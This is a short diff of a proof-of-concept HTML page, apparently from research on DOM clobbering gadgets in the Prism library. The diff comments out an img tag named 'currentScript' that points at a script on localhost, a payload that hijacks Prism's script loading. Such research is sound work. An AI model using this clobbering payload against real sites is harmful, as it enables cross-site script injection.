--- a/domc-gadgets-assets/prism/poc.html
+++ b/domc-gadgets-assets/prism/poc.html
@@ -6,7 +6,7 @@
 
 <body>
 
-<img name=currentScript src="http://localhost:8000/a.js"></img>
+<!-- <img name=currentScript src="http://localhost:8000/a.js"></img> -->
 
 <script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/components/prism-core.js" integrity="sha512-jhk8ktzYxeUWJ/vx3Lzp53xE0Jgsp+UxA3wDyRSYeMBdPutgCp6jiGvTjyZm+R7cn3Lu/0MnEIR421EOdl3qAg==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
 <script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/plugins/autoloader/prism-autoloader.js"></script>
